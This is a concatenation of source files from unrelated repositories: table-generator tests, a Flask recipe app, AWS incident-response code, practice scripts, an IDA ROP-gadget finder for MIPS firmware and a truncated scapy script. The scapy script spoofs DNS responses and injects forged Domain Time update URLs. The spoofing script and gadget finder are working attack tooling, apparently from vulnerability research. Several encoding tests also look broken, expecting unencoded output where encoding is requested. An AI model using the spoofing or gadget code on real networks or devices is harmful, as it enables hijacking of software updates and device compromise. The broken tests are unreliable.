self.assertEqual(
Table( { 'data': data } ).south(),
Table( { 'data': data, 'theta': -180, 'pinhead': 1 } ).generate(),
"south is theta -180 via constructor and method"
)
self.assertEqual(
Table().south( data ),
Table().generate( data, 'theta', -180, 'pinhead', 1 ),
"south is theta -180 with array ref"
)
self.assertEqual(
Table().south( { 'data': data } ),
Table().generate( { 'data': data, 'theta': -180, 'pinhead': 1 } ),
"south is theta -180 named args only"
)
if __name__ == '__main__':
unittest.main()
```
#### File: Spreadsheet-HTML-python/t/12-encodes.py
```python
import unittest
from Spreadsheet.HTML import Table
class TestEncodes(unittest.TestCase):
def test_encodes(self):
data = [
[ 'header1', 'header2', 'header3' ],
[ '<foo1>', '&bar1', '"baz1' ],
[ '<foo2>', '&bar2', '"baz2' ],
[ '', '0', '' ],
]
gen = Table( { 'data': data } )
self.assertEqual(
'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate(),
"nothing encoded by default"
)
self.assertEqual(
'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate( { 'encode': 1 } ),
"default encoding works"
)
self.assertEqual(
'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate( { 'encodes': '&' } ),
"only requested char is encoded"
)
self.assertEqual(
'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate( { 'encodes': '0' } ),
"zero as requested char is encoded"
)
self.assertEqual(
'<table><tr><th>header1</th><th>header2</th><th>header3</th></tr><tr><td><foo1></td><td>&bar1</td><td>"baz1</td></tr><tr><td><foo2></td><td>&bar2</td><td>"baz2</td></tr><tr><td> </td><td>0</td><td> </td></tr></table>',
gen.generate( { 'encodes': 'a&"' } ),
"requested chars are encoded"
)
if __name__ == '__main__':
unittest.main()
```
#### File: Spreadsheet-HTML-python/t/13-caption.py
```python
import unittest
from Spreadsheet.HTML import Table
class TestCaption(unittest.TestCase):
def test_caption(self):
data = [
[ 'a', 'b', 'c' ],
[ '1', '2', '3' ],
[ '4', '5', '6' ],
]
gen = Table( { 'data': data, 'caption': "My Table" } )
self.assertEqual(
'<table><caption>My Table</caption><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate(),
"caption present from generate()"
)
gen = Table( { 'data': data, 'caption': { "My Table": { 'key': 'value' } } } )
self.assertEqual(
'<table><caption key="value">My Table</caption><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate(),
"caption present from generate()"
)
self.assertEqual(
'<table><caption key="value">My Table</caption><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',
gen.generate( { 'tgroups': 2 } ),
"caption present from generate() with tgroups"
)
self.assertEqual(
'<table><caption>0</caption><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'caption': 0 } ),
"caption can be overriden"
)
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeffathammnet/recipes_flask",
"score": 3
}
|
#### File: jeffathammnet/recipes_flask/app.py
```python
from flask import Flask, render_template, request, flash, redirect, url_for, session
import redis
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import or_
import uuid
from cfg import config
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = config.SQLALCHEMY_DATABASE_URI
app.config['SECRET_KEY'] = config.SECRET_KEY
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = config.SQLALCHEMY_TRACK_MODIFICATIONS
db = SQLAlchemy(app)
r = redis.Redis(host=config.REDIS_HOST, port=config.REDIS_PORT, db=0)
class Recipes(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
healthy = db.Column(db.Boolean(), nullable=False)
prepTime = db.Column(db.Integer, nullable=False)
cookTime = db.Column(db.Integer, nullable=False)
servings = db.Column(db.Integer, nullable=False)
ingredients = db.Column(db.String(10000), nullable=False)
directions = db.Column(db.String(10000), nullable=False)
def __repr__(self):
return '<Recipe %r>' % self.name
@app.before_request
def before_request_callback():
#Create a session ID for the user
if not "uid" in session:
session['uid'] = uuid.uuid1().int
@app.route("/")
def index():
return redirect(url_for("view_get"))
@app.route("/new")
def new_get():
'''Create a new recipe entry
'''
return render_template("new.html")
@app.route("/new", methods=["POST"])
def new_post():
'''Add new recipe entry to DB
'''
new_recipe = Recipes(
name = request.form.get('title'),
healthy = True if request.form.get('healthy-bool') else False,
prepTime = int(request.form['prep-time']) if request.form.get('prep-time').isnumeric() else 0,
cookTime = int(request.form['cook-time']) if request.form.get('cook-time').isnumeric() else 0,
servings = int(request.form['servings']) if request.form.get('servings').isnumeric() else 0,
ingredients = request.form.get('ingredients'),
directions = request.form.get('directions')
)
db.session.add(new_recipe)
db.session.commit()
flash("Recipe addedd successfully")
return redirect(url_for("new_get"))
@app.route("/view")
def view_get():
'''View all recipes
'''
j2_data = {'recipes': Recipes.query.all() }
return render_template("view.html", j2_data=j2_data)
@app.route("/view/<int:recipeID>")
def view_id_get(recipeID):
'''View specific recipe
'''
recipe = Recipes.query.filter(Recipes.id == recipeID).first()
j2_data = {'single_recipe':
{
"recipe": recipe,
}
}
return render_template("view.html", j2_data=j2_data)
@app.route("/view", methods=["POST"])
def view_post():
'''Add new recipe entry to DB
'''
if request.form.get("delete"):
#Delete action
Recipes.query.filter(Recipes.id==request.form.get("recipeID")).delete()
db.session.commit()
flash("Recipe deleted successfully")
return redirect(url_for("view_get"))
else:
#Update Recipe
recipe = Recipes.query.filter(Recipes.id==request.form.get("recipeID")).first()
recipe.name = request.form.get('title')
recipe.healthy = True if request.form.get('healthy-bool') else False
recipe.prepTime = int(request.form['prep-time']) if request.form.get('prep-time').isnumeric() else 0
recipe.cookTime = int(request.form['cook-time']) if request.form.get('cook-time').isnumeric() else 0
recipe.servings = int(request.form['servings']) if request.form.get('servings').isnumeric() else 0
recipe.ingredients = request.form.get('ingredients')
recipe.directions = request.form.get('directions')
db.session.commit()
flash("Recipe updated successfully")
return redirect(url_for("view_get")+"/"+request.form["recipeID"])
@app.route("/menu", methods=["GET"])
def menu_get():
'''View menu for current user session
'''
j2_data = {}
#Validate user has items in menu
if r.llen(session['uid']) > 0:
j2_data['recipes'] = []
#Query for menu item details
for menuID in r.lrange(session['uid'],0,-1):
recipe = Recipes.query.filter(Recipes.id==int(menuID)).first()
#Append if exists.
if recipe:
j2_data['recipes'].append(recipe)
return render_template("menu.html", j2_data=j2_data)
@app.route("/menu/shopping-list", methods=["GET"])
def menu_shopping_list_get():
'''View menu for current user session
'''
j2_data = {}
#Validate user has items in menu
if r.llen(session['uid']) > 0:
j2_data['shopping_list'] = []
#Query for menu item details
for menuID in r.lrange(session['uid'],0,-1):
#Add each ingredient to shopping list
j2_data['shopping_list'] += Recipes.query.filter(Recipes.id==int(menuID)).first().ingredients.split("\r\n")
return render_template("menu.html", j2_data=j2_data)
@app.route("/menu", methods=["POST"])
def menu_post():
'''Update menu for current user session
'''
#Delete all items from menu
if request.form.get('reset_menu'):
r.delete(session['uid'])
flash("Menu has been cleared")
#Remove 1 occurence of menu item form list
elif request.form.get('remove_menu_item'):
r.lrem(session['uid'],1, request.form['remove_menu_item'])
#Add random items to menu
elif request.form.get('add_random_count'):
add_random_count = int(request.form.get('add_random_count', 0))
found_count = 0
loop_count = 0
#Search up to 10 times to find unique number of menu items requested.
while found_count < add_random_count and loop_count <= 10:
random_recipes = Recipes.query.order_by(db.func.random()).limit(int(request.form['add_random_count'])).all()
for recipe in random_recipes:
if not bytes(str(recipe.id), encoding="utf8") in r.lrange(session['uid'],0,-1):
r.lpush(session['uid'], recipe.id)
found_count += 1
loop_count += 1
if loop_count > 10:
flash("Not able to find enough recipes")
flash("Random recipes added")
#Add single item to menu
else:
if not bytes(str(request.form['recipeID']), encoding="utf8") in r.lrange(session['uid'],0,-1):
r.lpush(session['uid'], int(request.form.get('recipeID')))
else:
flash("Recipe already added to menu.")
return redirect(url_for("menu_get"))
@app.route("/search")
def search_get():
'''Search recipe title and ingredients to find a match
'''
j2_data = {}
query = request.args.get('q')
search_result = j2_data['recipes'] = Recipes.query.filter(or_(Recipes.name.like(f"%{query}%"),Recipes.ingredients.like(f"%{query}%"))).all()
if not search_result:
flash("No items found")
return render_template("view.html", j2_data=j2_data)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True, port=8443, ssl_context=(config.SSL_CERTIFICATE, config.SSL_KEY))
```
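The app reads its settings from a cfg.config module that is not included here; a minimal illustrative stub (every value is a placeholder) might look like this.
```python
# cfg/config.py -- illustrative stub only; all values below are placeholders
SQLALCHEMY_DATABASE_URI = 'sqlite:///recipes.db'
SQLALCHEMY_TRACK_MODIFICATIONS = False
SECRET_KEY = 'change-me'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
SSL_CERTIFICATE = 'cert.pem'
SSL_KEY = 'key.pem'
```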
|
{
"source": "jeffa/window-viewport",
"score": 3
}
|
#### File: window-viewport/t/01-load.py
```python
import unittest
from window.viewport import viewport
class TestLoad(unittest.TestCase):
def test_defaults(self):
w2v = viewport()
self.assertIsInstance( w2v, viewport, 'object is instance of class' )
if __name__ == '__main__':
unittest.main()
```
#### File: window-viewport/t/02-run.py
```python
import unittest
from math import sin
#import window.viewport
from window.viewport import viewport
class TestLoad(unittest.TestCase):
def test_defaults(self):
w2v = viewport( Wb = 0, Wt = 1, Wl = 0, Wr = 1, Vb = 9, Vt = 0, Vl = 0, Vr = 9 )
self.assertEqual( w2v.Dx(.5), 4.5, 'correct Dx()' )
self.assertEqual( int(w2v.Dy(.6)), 3, 'correct Dy()' )
x = 0
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 0, 'correct Dx() sin wave 1/5' )
self.assertEqual( int(w2v.Dy(y)), 9, 'correct Dy() sin wave 1/5' )
x = 0.1
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 0, 'correct Dx() sin wave 2/5' )
self.assertEqual( int(w2v.Dy(y)), 8, 'correct Dy() sin wave 2/5' )
x = 0.2
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 1, 'correct Dx() sin wave 3/5' )
self.assertEqual( int(w2v.Dy(y)), 7, 'correct Dy() sin wave 3/5' )
x = 0.3
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 2, 'correct Dx() sin wave 4/5' )
self.assertEqual( int(w2v.Dy(y)), 6, 'correct Dy() sin wave 4/5' )
x = 0.4
y = sin(x)
self.assertEqual( int(w2v.Dx(x)), 3, 'correct Dx() sin wave 5/5' )
self.assertEqual( int(w2v.Dy(y)), 5, 'correct Dy() sin wave 5/5' )
if __name__ == '__main__':
unittest.main()
```
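The assertions above are consistent with the standard window-to-viewport transformation; the sketch below shows the assumed mapping (not the library's actual implementation) using the same window and viewport bounds as the test.
```python
# Assumed linear mapping from window [Wl, Wr] x [Wb, Wt] to viewport [Vl, Vr] x [Vb, Vt]
def Dx(x, Wl=0, Wr=1, Vl=0, Vr=9):
    return Vl + (x - Wl) * (Vr - Vl) / (Wr - Wl)

def Dy(y, Wb=0, Wt=1, Vb=9, Vt=0):
    return Vb + (y - Wb) * (Vt - Vb) / (Wt - Wb)

print(Dx(0.5))       # 4.5, matching the first assertion above
print(int(Dy(0.6)))  # 3
```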
|
{
"source": "jeffb4/aws_ir",
"score": 2
}
|
#### File: aws_ir/libs/case.py
```python
import logging
import os
import random
import sys
from datetime import datetime
import aws_ir
from aws_ir.libs import aws
from aws_ir.libs import connection
from aws_ir.libs import inventory
from aws_ir.libs import s3bucket
logger = logging.getLogger(__name__)
class Case(object):
"""Takes case number and examiner cidr."""
def __init__(
self,
case_number=None,
examiner_cidr_range='0.0.0.0/0',
case_bucket=None,
profile='default',
case_type=None
):
self.profile = profile
self.ec2_client = connection.Connection(
type='client',
service='ec2',
region='us-west-2',
profile=self.profile
)
self.s3_resource = connection.Connection(
type='resource',
service='s3',
region='us-west-2',
profile=self.profile
)
if case_number:
self.case_number = case_number
else:
self.case_number = self._generate_case_number()
if case_bucket:
self.case_bucket = case_bucket
else:
self.case_bucket = self._setup_bucket(region='us-west-2')
self.examiner_cidr_range = examiner_cidr_range
def prep_aws_connections(self):
"""Get all the required information before doing the mitigation. """
logger.info("Initial connection to AmazonWebServices made.")
self.amazon = aws.AmazonWebServices(
self.ec2_client
)
self.available_regions = self.amazon.regions
logger.info(("Inventory AWS Regions Complete {region_count} "
"found.".format(region_count=len(self.amazon.regions))))
self.availability_zones = self.amazon.availability_zones
logger.info(
(
"Inventory Availability Zones Complete {zone_count} "
"found.".format(zone_count=len(self.amazon.availability_zones))
)
)
logger.info(("Beginning inventory of resources world wide. "
"This might take a minute..."))
self.aws_inventory = inventory.Inventory(
self.ec2_client,
self.available_regions
)
logger.info(("Inventory complete. Proceeding to resource "
"identification."))
self.inventory = self.aws_inventory.inventory
def _rename_log_file(self, case_number, resource_id, base_dir="/tmp"):
"""Move all log files to standard naming format"""
try:
os.rename(
("{base_dir}/{case_number}-aws_ir.log").format(
base_dir=base_dir,
case_number=case_number,
),
("{base_dir}/{case_number}-{resource_id}-aws_ir.log").format(
base_dir=base_dir,
case_number=case_number,
resource_id=resource_id
)
)
return True
except Exception:
return False
def copy_logs_to_s3(self, base_dir="/tmp"):
"""Convinience function to put all case logs to s3 at the end"""
case_bucket = self._get_case_bucket()
logs = self._get_case_logs(base_dir=base_dir)
for log in logs:
case_bucket.upload_file(
"{base_dir}/{log}".format(
base_dir=base_dir,
log=log
),
log
)
def teardown(self, region, resource_id):
"""Any final post mitigation steps universal to all plans. """
try:
aws_ir.wrap_log_file(self.case_number)
self._rename_log_file(self.case_number, resource_id)
self.copy_logs_to_s3()
processing_end_messaging = (
"""Processing complete for {case_number}\n"""
"""Artifacts stored in s3://{case_bucket}"""
).format(case_number=self.case_number,
case_bucket=self.case_bucket)
print(processing_end_messaging)
sys.exit(0)
except Exception as e:
logger.error(
("Error uploading case logs for {case_number} to s3 "
"bucket {case_bucket}: {ex}".format(
case_number=self.case_number,
case_bucket=self.case_bucket,
ex=e)
)
)
sys.exit(1)
def _get_case_logs(self, base_dir="/tmp"):
"""Enumerates all case logs based on case number from system /tmp"""
files = []
for file in os.listdir(base_dir):
if file.startswith(self.case_number):
files.append(file)
return files
def _setup_bucket(self, region):
"""Wrap s3 find or create in object"""
client = connection.Connection(
type='client',
service='s3'
).connect()
bucket_name = s3bucket.CaseBucket(
self.case_number,
region,
client,
self.s3_resource
).bucket.name
return bucket_name
def _get_case_bucket(self):
return self.s3_resource.connect().Bucket(self.case_bucket)
def _generate_case_number(self):
return datetime.utcnow().strftime(
'cr-%y-%m%d%H-{0:04x}'
).format(
random.randint(0, 2 ** 16)
)
```
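A brief construction sketch for the Case class above; the CIDR and profile values are placeholders, and valid AWS credentials are assumed since the constructor creates the case bucket.
```python
# Hypothetical values, illustration only
case = Case(examiner_cidr_range='203.0.113.0/24', profile='default')
case.prep_aws_connections()
print(case.case_number, case.case_bucket)
```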
#### File: aws_ir/libs/s3bucket.py
```python
import uuid
"""Class to create the cases s3 bucket for asset storage"""
class CaseBucket(object):
def __init__(self, case_number, region, client, resource):
self.region = region
self.case_number = case_number
self.client = client
self.s3 = resource.connect()
self.bucket = self.find_or_create_by()
def find_or_create_by(self):
bucket = self._locate_bucket()
if bucket is not None:
return bucket
else:
self.bucket_name = self._generate_name()
bucket = self._create_s3_bucket()
self._set_acls(self.bucket_name)
self._set_tags(self.bucket_name)
self._set_versioning(self.bucket_name)
return bucket
def cleanup_empty_buckets(self):
buckets = self.client.list_buckets()
for bucket in buckets['Buckets']:
if str(bucket['Name']).find('cloud-response') != -1:
try:
self.client.delete_bucket(Bucket=bucket['Name'])
print(bucket['Name'])
except Exception:
pass
def _generate_name(self):
bucket_name = 'cloud-response-' + str(uuid.uuid4()).replace('-', '')
return bucket_name
def _create_s3_bucket(self):
# the if statement is to prevent
# a fun little bug https://github.com/boto/boto3/issues/125
if self.region == 'us-east-1':
bucket = self.s3.create_bucket(
Bucket=self.bucket_name
)
else:
bucket = self.s3.create_bucket(
Bucket=self.bucket_name,
CreateBucketConfiguration={
'LocationConstraint': self.region
}
)
return bucket
def _set_acls(self, bucket_name):
self.s3.BucketAcl(bucket_name).put(ACL='bucket-owner-full-control')
def _set_tags(self, bucket_name):
self.client.put_bucket_tagging(
Bucket=bucket_name,
Tagging=dict(
TagSet=[
dict(
Key='cr-case-number',
Value=self.case_number
)
]
)
)
def _set_versioning(self, bucket_name):
self.client.put_bucket_versioning(
Bucket=bucket_name,
VersioningConfiguration=dict(
MFADelete='Disabled',
Status='Enabled'
)
)
def _locate_bucket(self):
buckets = self.s3.buckets.all()
for bucket in buckets:
if bucket.name.startswith("cloud-response-"):
tags = self._get_bucket_tags(bucket.name)
if self._check_tags(tags):
case_bucket = bucket
return case_bucket
# no tag match on this bucket; keep checking the remaining buckets
else:
pass
def _get_bucket_tags(self, bucket):
try:
s3 = self.client
response = s3.get_bucket_tagging(
Bucket=bucket,
)
except Exception:
response = None
return response
def _check_tags(self, tag_object):
if tag_object is None:
return False
elif tag_object.get('TagSet', None) is not None:
for tag in tag_object['TagSet']:
if tag['Value'] == self.case_number:
return True
# not the case tag; keep scanning the rest of the TagSet
else:
return False
```
#### File: aws_ir/plans/key.py
```python
import logging
from aws_ir.libs import compromised
from aws_ir.libs import connection
from aws_ir.libs import plugin
from aws_ir.plans import steps_to_list
logger = logging.getLogger(__name__)
"""Compromise class for Key Compromise Procedure"""
class Compromise(object):
def __init__(
self,
examiner_cidr_range='0.0.0.0/0',
compromised_access_key_id=None,
region='us-west-2',
case=None,
steps=None
):
if compromised_access_key_id is None:
raise ValueError(
'Must specify an access_key_id for the compromised key.'
)
self.case_type = 'Key'
self.compromised_access_key_id = compromised_access_key_id
self.region = region
self.case = case
self.plugins = plugin.Core()
self.steps = steps_to_list(steps)
def mitigate(self):
"""Any steps that run as part of key compromises."""
access_key = self.compromised_access_key_id
compromised_resource = compromised.CompromisedMetadata(
compromised_object_inventory={
'access_key_id': access_key,
'region': self.region
},
case_number=self.case.case_number,
type_of_compromise='key_compromise'
).data()
session = connection.Connection(
type='session',
region='us-west-2'
).connect()
logger.info("Attempting key disable.")
for action in self.steps:
step = self.plugins.source.load_plugin(action)
step.Plugin(
boto_session=session,
compromised_resource=compromised_resource,
dry_run=False
)
```
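A brief sketch of driving the key-compromise plan above; the access key ID and step name are placeholders, and a prepared Case object plus valid AWS credentials are assumed.
```python
compromise = Compromise(
    compromised_access_key_id='AKIAIOSFODNN7EXAMPLE',  # placeholder key ID
    region='us-west-2',
    case=case,                  # a Case object created as in libs/case.py above
    steps='disable_key'         # hypothetical plugin name; use whichever plugins are installed
)
compromise.mitigate()
```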
#### File: aws_ir/tests/test_logging.py
```python
import os
import aws_ir
from aws_ir import TimesketchLogger
import logging
CASE_NUMBER = "cr-17-000001-2d2d"
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
LOG_FILE = "{0}/{1}-aws_ir.log".format(BASE_DIR, CASE_NUMBER)
class TestLogging(object):
def test_logging(self):
logger = logging.getLogger('aws_ir')
# ensure custom logger class is in place
assert logger.__class__ == TimesketchLogger
# ensure that null log handler is in place by default
assert len(logger.handlers) == 1
assert logger.handlers[0].__class__ == aws_ir.NullHandler
# setup stream handler and ensure the object was created
aws_ir.set_stream_logger(level=logging.INFO)
assert len(logger.handlers) == 2
assert logger.handlers[1].__class__ == logging.StreamHandler
# setup file handler and ensure the object was created
aws_ir.set_file_logger(
CASE_NUMBER, base_dir=BASE_DIR,
level=logging.INFO
)
assert len(logger.handlers) == 3
assert logger.handlers[2].__class__ == logging.FileHandler
# test log file is created
aws_ir.wrap_log_file(CASE_NUMBER, base_dir=BASE_DIR)
logger.info("test of file log")
assert os.path.isfile(LOG_FILE) is True
aws_ir.wrap_log_file(CASE_NUMBER, base_dir=BASE_DIR)
# check file contents
with open(LOG_FILE, 'r') as f:
lines = f.readlines()
assert "[" in lines[0]
assert "test of file log" in lines[1]
assert "]" in lines[-1]
def teardown_method(self, method):
# clear all but the aws_ir.NullHandler
logger = logging.getLogger('aws_ir')
for handler in logger.handlers:
if handler.__class__ != aws_ir.NullHandler:
logger.removeHandler(handler)
# cleanup the log file if it was created
if os.path.isfile(LOG_FILE):
os.remove(LOG_FILE)
```
|
{
"source": "jeffb4real/scripts",
"score": 2
}
|
#### File: jeffb4real/scripts/clip_naming_example.py
```python
import os
def run_test(root_dir, mlp_in, clip_list):
# We've successfully passed "by position" (section 1.3.1 on the confluence page).
# But if you notice that sometimes you need to pass certain args and other times not pass them,
# then consider using the pass by "keyword arguments" approach (which can include default values
# for keyword args that aren't passed to the function).
print '\nmlp_in: ', mlp_in, '\n'
for clip in (clip_list):
full_clip_name = os.path.join(root_dir, clip)
print full_clip_name
print "\n\n"
# An exercise in filename mangling
for clip in (clip_list):
full_clip_name = os.path.join(root_dir, clip)
# head will be the path; tail is all the non-path stuff
head, tail = os.path.split(full_clip_name)
name, ext = os.path.splitext(tail)
print head + '/' + name + '_reconnected.mlp'
root_dir = 'c:/temp'
mlp_in = 'ABC.mlp'
clip_list = ('clipA', 'clipB', 'clipC')
# I think there's no need to define the following explicitly, as the names can be formed based on mlp_in
# connected_mlp_out =
# decoded_wav_out =
run_test(root_dir, mlp_in, clip_list)
```
#### File: jeffb4real/scripts/function_decorators2.py
```python
def outer_func(msg):
def inner_func():
print msg
return inner_func
hi_func = outer_func('Hi')
bye_func = outer_func('Bye')
hi_func()
bye_func()
```
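The closure above keeps msg alive after outer_func returns; the p_decorate example in misc.py below relies on the same pattern, with the inner function wrapping a call to the captured function. A small sketch:
```python
def shout(func):
    # wrapper closes over func and forwards any arguments to it
    def wrapper(*args, **kwargs):
        return func(*args, **kwargs).upper()
    return wrapper

@shout
def greet(name):
    return 'hello, %s' % name

print(greet('world'))  # HELLO, WORLD
```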
#### File: jeffb4real/scripts/misc.py
```python
import os
import sys
from sys import version_info
import time
import re
# Function decorators
def p_decorate(func):
def func_wrapper(*args, **kwargs):
return "<p>{0}</p>".format(func(*args, **kwargs))
return func_wrapper
class Person(object):
def __init__(self):
print
self.name = "John"
self.family = "Doe"
@p_decorate
def get_fullname(self):
return self.name+" "+self.family
def do_stuff():
return "{0}"
my_person = Person()
my_person.name = 'Jerry'
#print my_person.get_fullname()
#print
#print do_stuff()
py3 = version_info[0] > 2 # Creates boolean value for test that Python major version > 2
print py3 == 0,
print
if py3:
sometext = str(input('Please enter some text: '))
else:
sometext = str(raw_input('Please enter some text: '))
print 'Hello, {}!'.format(sometext)
#print int(sometext)*int(sometext)
foo=3
bar='help'
print foo
print bar
print
x='there are %d types of people in the world' % 10
print x
sys.exit()
#re.match(var, 'hell')
#print match.group(0)
#print match.group(1)
#print match.group(2)
# OOPS: inheritance, polymorphism (compile time: overloading; run time: override), encapsulation, abstraction)
# JAVA: == is comparison operator, compares reference/address; .equal compares the contents, e.g. string vs. string
```
#### File: jeffb4real/scripts/print_module_info.py
```python
import os, sys, re, subprocess, platform, shutil, argparse, test, xml, time, urllib2, getopt
import importlib
# From Django tutorial05
from django.test import TestCase
def print_modules(module_list):
for mod in module_list:
print '------------'
print mod
print '------------'
module = importlib.import_module(mod, package=None)
print str(dir(module)).replace("'", '')
print
# Print string names
print '------------'
print 'String'
print '------------'
print str(dir('abc')).replace("'", '')
print
# Print list names
print '------------'
print 'List'
print '------------'
print str(dir([1,2,3])).replace("'", '')
print
# Print list names
print '------------'
print 'os.path'
print '------------'
print str(dir(os.path)).replace("'", '')
print
# Use split() on a string to create a list (the lazy way!)
module_list = 'os sys re subprocess platform shutil argparse test xml time urllib2 getopt'.split()
print_modules (module_list)
#print_modules('TestCase')
```
#### File: jeffb4real/scripts/test1.py
```python
import pytest
@pytest.mark.parametrize(("a,b"), [(1,1), (1,1), (1,2)],
ids=["basic", None, "advanced"])
def test_function(a, b):
assert a == b
```
|
{
"source": "jeffb4real/SLHPA-Web-App",
"score": 2
}
|
#### File: mysite/slhpa/dummyview.py
```python
from django.http import HttpResponse
def hello(request):
return HttpResponse("<NAME>. Your database may not be loaded.")
```
#### File: mysite/slhpa/filters.py
```python
import django_filters as filters
from .models import PhotoRecord
class PhotoFilter(filters.FilterSet):
def __init__(self, *args, **kwargs):
super(PhotoFilter, self).__init__(*args, **kwargs)
self.filters['resource_name__contains'].label = "Photo Identifier contains"
class Meta:
model = PhotoRecord
fields = {
"resource_name": ["contains"],
"title": ["contains"],
"description": ["contains"],
"subject": ["contains"],
"year": ["exact"],
# "year": ["exact", "range"],
}
```
|
{
"source": "jeffball55/NotQuite0DayFriday",
"score": 2
}
|
#### File: 2020.06.15-netgear/tools/find_mips_gadget.py
```python
import sys
import os
import idaapi
import idc
MAX_PREVIOUS_SEARCH = 10
def call_xrefs(function_name):
function_address = LocByName(function_name)
for addr in XrefsTo(function_address):
mnem = GetMnem(addr.frm)
# We only care about the calls
if mnem not in ['jalr', 'jr']:
continue
yield addr.frm
def print_gadget(fd, start, end, stack_size):
fd.write("Found gadget (address 0x{:x} buffer $sp+0x{:x})\n".format(start, stack_size))
for address in range(start, end+4, 4):
fd.write("0x{:x}: {}\n".format(address, GetDisasm(address)))
fd.write("\n")
def find_gadget(symbol_name, filename = None):
stack_write_inst = "addiu $a0, $sp,"
required = [
[stack_write_inst],
["la $t9,", "lw $t9,"],
]
disallowed_starts = [
# No calls/branches in our
"jalr", "jr", "b",
# Writing to memory could crash, let's skip it.
# It might be worthwhile to exclude sp here.
"lw", "lh", "lb",
"sw", "sh", "sb",
]
bad_register_writes = [
"a0", "t9",
]
fd = sys.stdout
if filename != None:
fd = open(filename, 'w')
for symbol_call in call_xrefs(symbol_name):
mnem = GetMnem(symbol_call)
found_insts = {}
stack_size = None
first_address = symbol_call
for x in range(4, -MAX_PREVIOUS_SEARCH * 4, -4):
if x == 0:
continue
inst_address = symbol_call+x
if x < 0:
first_address = inst_address
disasm = GetDisasm(inst_address)
for required_inst in required:
if any([x in disasm for x in required_inst]):
found_insts[inst_address] = required_inst
if stack_size == None and disasm.startswith(stack_write_inst):
stack_size = GetOperandValue(inst_address, 2)
break
if inst_address not in found_insts:
if any([disasm.startswith(x) for x in disallowed_starts]):
break
if GetOpnd(inst_address, 0) in bad_register_writes:
break
if len(required) == len(found_insts):
print_gadget(fd, first_address, symbol_call+4, stack_size)
break
if filename != None:
fd.close()
def find_system_gadget(filename = None):
find_gadget("system", filename)
idaapi.autoWait()
find_system_gadget(os.environ.get("OUTPUT_GADGET_NAME"))
if os.environ.get("OUTPUT_GADGET_NAME") != None:
idc.Exit(0)
```
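The OUTPUT_GADGET_NAME environment variable and the idc.Exit(0) call suggest the script is meant for headless batch runs; a possible invocation sketch (the idat flags and all paths are assumptions to adapt for your IDA install and target binary):
```python
import os
import subprocess

# All paths below are placeholders
env = dict(os.environ, OUTPUT_GADGET_NAME='/tmp/system_gadgets.txt')
subprocess.run(
    ['idat64', '-A', '-S/path/to/find_mips_gadget.py', '/path/to/target_binary'],
    env=env, check=True,
)
print(open('/tmp/system_gadgets.txt').read())
```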
#### File: 2021.04.06-domain-time-2/upgrade-attack/upgrade_attack.py
```python
from multiprocessing import Process
from time import sleep
import argparse
import http.server
import re
import socketserver
import socket
from scapy.all import *
def build_dns_response(query, name):
ip = query[IP]
udp = query[UDP]
dns = query[DNS]
dns_answer = DNSRR(rrname=name, type='A', rclass='IN', ttl=5, rdata=server_ip)
response = IP(src=ip.dst, dst=ip.src)
response /= UDP(sport=udp.dport, dport=udp.sport)
response /= DNS(id=dns.id, qr=1, aa=0, qdcount=1, ancount=1, qd=dns.qd, an=dns_answer)
return response
def parse_dns_query(pkt):
if DNSRR in pkt:
name = pkt[DNSRR].rrname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Response for "{name}" from {pkt[IP].src}')
elif DNSQR in pkt:
name = pkt[DNSQR].qname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Query for "{name}" from {pkt[IP].src}')
for update_domain in update_domains:
if name.startswith(update_domain):
dns_response = build_dns_response(pkt, name)
send(dns_response, iface=sniff_iface)
print(f'[+] Target DNS Query responded to with {server_ip}')
def parse_dt2_pkt(pkt):
ip = pkt[IP]
udp = pkt[UDP]
print(f'DT2 from {ip.src}:{udp.sport} to {ip.dst}:{udp.dport}')
if ip.dst == server_ip:
update_regex = b'[1-5]\\.[0-9]\\..\\.[0-9]*\x00'
if re.search(update_regex, udp.payload.load):
dt2 = udp.payload
update_response = IP(src=ip.dst, dst=ip.src)
update_response /= UDP(sport=udp.dport, dport=udp.sport)
update_response /= update_url.encode('utf-8') + b"\x00"
send(update_response, iface=sniff_iface)
print(f'[+] Responded to target DT2 Update request: {dt2.load}')
def udp_callback(pkt):
if IP not in pkt or UDP not in pkt:
return
